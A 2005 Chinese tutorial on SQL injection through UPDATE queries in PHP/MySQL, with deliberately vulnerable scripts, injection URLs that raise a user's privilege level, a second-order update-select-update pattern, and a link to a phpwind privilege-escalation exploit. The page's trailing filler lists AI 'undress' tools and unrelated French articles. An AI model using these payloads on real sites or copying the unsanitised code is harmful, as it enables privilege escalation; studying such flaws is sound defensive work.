UPDATE注射(mysql+php)的两个模式_PHP
本文作者:SuperHei
文章性质:原创
发布日期:2005-08-14
一、测试环境
OS: Windowsxp sp2
php: php 4.3.10
mysql 4.1.9
apache 1.3.33
二、测试数据库结构
-- 数据库: `test`
--
-- --------------------------------------------------------
--
-- 表的结构 `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default '1',
`user` varchar(12) NOT NULL default 'heige',
`pass` varchar(122) NOT NULL default '123456'
) TYPE=MyISAM;
--
-- 导出表中的数据 `userinfo`
--
INSERT INTO `userinfo` VALUES ('2', 'heige', '123456')
三、测试模式
1、变量没有带''或""
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=$p where user='heige'";//
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
脚本里只是修改 user='heige' 的 pass,如果 groudid 表示用户的权限等级,我们的目的就是通过构造 $p 来达到修改 groupid 的目的,那么我们提交:
http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查询:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
用户heige的groudid又2改为1了 :)
所以我们可以得到没有''或""update的注射是可以成功的,这个就是我们的模式1。
2、变量带''或""
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass='$p' where user='heige'";//
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
为了关闭'我们构造$p应该为 123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1
在gpc=on的情况下'变成了\',提交的语句变成:
SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'
mysql查询:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被''或""时 就完全没有被注射呢?不是 下面我们看模式2:
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass='$p' where user='heige'";//
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的数据写入数据库
$sql= "select pass from userinfo where user='heige'";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查询输出给$userinfo[0]
$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我们测试下,提交:
http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:
update --> select --> update
四、实际模式
模式1:缺
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析
update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
↓
select (jop.php)
↓
updtate (jop.php)
Exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe
五、鸣谢
特别感谢saiy等朋友的讨论和帮助。Thanks!!
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
Video Face Swap
Échangez les visages dans n'importe quelle vidéo sans effort grâce à notre outil d'échange de visage AI entièrement gratuit !
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
À quoi sert le mode Ne pas déranger de WeChat ?
Feb 23, 2024 pm 10:48 PM
Que signifie le mode Ne pas déranger de WeChat ? De nos jours, avec la popularité des smartphones et le développement rapide de l'Internet mobile, les plateformes de médias sociaux sont devenues un élément indispensable de la vie quotidienne des gens. WeChat est l’une des plateformes de médias sociaux les plus populaires en Chine, et presque tout le monde possède un compte WeChat. Nous pouvons communiquer avec nos amis, notre famille et nos collègues en temps réel via WeChat, partager des moments de notre vie et comprendre la situation actuelle de chacun. Cependant, à notre époque, nous sommes également inévitablement confrontés aux problèmes de surcharge d'informations et de fuite de la vie privée, en particulier pour ceux qui ont besoin de se concentrer ou de se concentrer.
A quoi sert le mode veille sur iPhone ?
Nov 04, 2023 am 11:13 AM
Les appareils iOS sont depuis longtemps capables de suivre vos habitudes de sommeil et bien plus encore grâce à l'application Santé. Mais n’est-ce pas ennuyeux d’être dérangé par des notifications pendant que vous dormez ? Ces notifications peuvent ne pas être pertinentes et donc perturber vos habitudes de sommeil. Bien que le mode Ne pas déranger soit un excellent moyen d'éviter les distractions pendant votre sommeil, il peut vous faire manquer des appels et des messages importants que vous recevez pendant la nuit. Heureusement, c'est là qu'intervient le mode veille. Apprenons-en plus à ce sujet et comment l'utiliser sur iPhone. Quel rôle joue le mode veille sur l'iPhone ? Le mode veille est un mode de concentration dédié dans iOS qui est automatiquement activé en fonction de votre horaire de sommeil dans l'application « Santé ». Cela vous aide à définir une alarme, puis
Le mode Ne pas déranger ne fonctionne pas sur iPhone : correctif
Apr 24, 2024 pm 04:50 PM
Même répondre à des appels en mode Ne pas déranger peut être une expérience très ennuyeuse. Comme son nom l'indique, le mode Ne pas déranger désactive toutes les notifications d'appels entrants et les alertes provenant d'e-mails, de messages, etc. Vous pouvez suivre ces ensembles de solutions pour résoudre ce problème. Correctif 1 – Activer le mode de mise au point Activez le mode de mise au point sur votre téléphone. Étape 1 – Faites glisser votre doigt depuis le haut pour accéder au Centre de contrôle. Étape 2 – Ensuite, activez le « Mode Focus » sur votre téléphone. Le mode Focus active le mode Ne pas déranger sur votre téléphone. Aucune alerte d’appel entrant n’apparaîtra sur votre téléphone. Correctif 2 – Modifier les paramètres du mode de mise au point S'il y a des problèmes dans les paramètres du mode de mise au point, vous devez les résoudre. Étape 1 – Ouvrez la fenêtre des paramètres de votre iPhone. Étape 2 – Ensuite, activez les paramètres du mode Focus
Que signifie le mode epc+o ?
Nov 09, 2022 am 10:54 AM
Le modèle epc+o fait référence au cadre contractuel général qui intègre la conception, l'approvisionnement, etc. Il s'agit de certains liens opérationnels dérivés de l'epc ; c'est-à-dire que pendant la période de construction, l'entrepreneur général ne doit pas seulement entreprendre des tâches de conception au sens traditionnel du terme. De plus, il doit également entreprendre toutes les tâches de maintenance pendant la période d'exploitation. Ce modèle peut grandement améliorer l'efficacité opérationnelle de nombreux projets et réduire rapidement les coûts d'exploitation.
iPhone 15 Pro : Comment se débarrasser du symbole du mode silencieux dans la barre d'état
Sep 24, 2023 pm 10:01 PM
Sur les modèles iPhone 15 Pro et iPhone 15 Pro Max, Apple a introduit un bouton d'action physiquement programmable qui remplace le traditionnel interrupteur sonnerie/silencieux au-dessus des boutons de volume. Le bouton d'action peut être programmé pour exécuter plusieurs fonctions différentes, mais la possibilité de basculer entre les modes silencieux et sonnerie n'a pas disparu. Par défaut, un appui long sur le bouton d'action mettra l'appareil sous silence et le retour tactile du bouton clignotera trois fois. Les deux modèles d'iPhone 15 Pro afficheront un symbole de cloche barrée à côté de l'heure dans la barre d'état pour indiquer que le mode silencieux/silencieux est activé, et il le restera jusqu'à ce que vous appuyiez à nouveau longuement sur le bouton Action pour réactiver l'appareil. Si vous préférez mettre votre iPhone en mode silencieux
Comment quitter le mode S sous Windows 10/11
Aug 03, 2023 pm 08:17 PM
Windows en mode S est conçu pour offrir une sécurité et des performances améliorées en autorisant uniquement l'installation d'applications à partir du Microsoft Store. Bien que cette fonctionnalité aide à prévenir les logiciels malveillants et à garantir un environnement informatique sécurisé, elle peut limiter les utilisateurs souhaitant installer des applications à partir de sources autres que le Microsoft Store. Si vous vous trouvez dans cette situation et que vous vous demandez sans cesse comment quitter le mode S sous Windows 10/11, alors vous êtes au bon endroit car nous vous expliquerons comment quitter le mode S sous Windows 10/11. en utilisant deux méthodes différentes, les étapes vers le mode S vous permettent de profiter de la liberté d'installer des applications où que vous soyez. Découvrez comment quitter le mode S sous Windows
Comment activer le « Mode sombre Notepad++ » et le « Thème sombre Notepad++ » ?
Oct 27, 2023 pm 11:17 PM
Le mode sombre de Notepad++ v8.0 n'a pas de paramètres, Notepad++ est l'éditeur de texte le plus utile. Chaque application exécutée sur Windows 10 prend en charge le mode sombre. Vous pouvez nommer des navigateurs Web tels que Chrome, Firefox et Microsoft Edge. Si vous travaillez sur Notepad++, le fond blanc par défaut peut vous faire mal aux yeux. Les développeurs ont ajouté le mode sombre à la version 8 de Notepad++, voici comment l'activer. Activer le Bloc-notes pour Windows 11/10 ++ Mode sombre Lancez le Bloc-notes ++ Cliquez sur "Paramètres" > "Préférences" > "Mode sombre" Sélectionnez "Activer le mode sombre" pour redémarrer le Bloc-notes
Guide d'utilisation du mode veille dans iOS 17
Aug 22, 2023 pm 04:01 PM
Le mode veille arrive sur iPhone avec iOS17, et ce guide vise à vous montrer comment utiliser cette fonctionnalité sur votre iPhone. Le mode veille est une fonctionnalité révolutionnaire qui transforme l’iPhone en un écran intelligent dynamique et toujours actif. Lorsque votre iPhone est posé horizontalement sur le côté pendant le chargement, il active le mode veille. Ce mode présente magnifiquement une multitude de widgets utiles, notamment l'heure actuelle, les mises à jour de la météo locale, un diaporama de vos photos préférées et même des commandes de lecture de musique. Un avantage significatif de ce mode est sa capacité à afficher des notifications, permettant aux utilisateurs de les visualiser et d'interagir avec elles sans avoir à réveiller complètement leur iPhone. Comment utiliser le mode veille Pour que le mode veille fonctionne correctement, votre iPhone doit être en cours d'exécution.
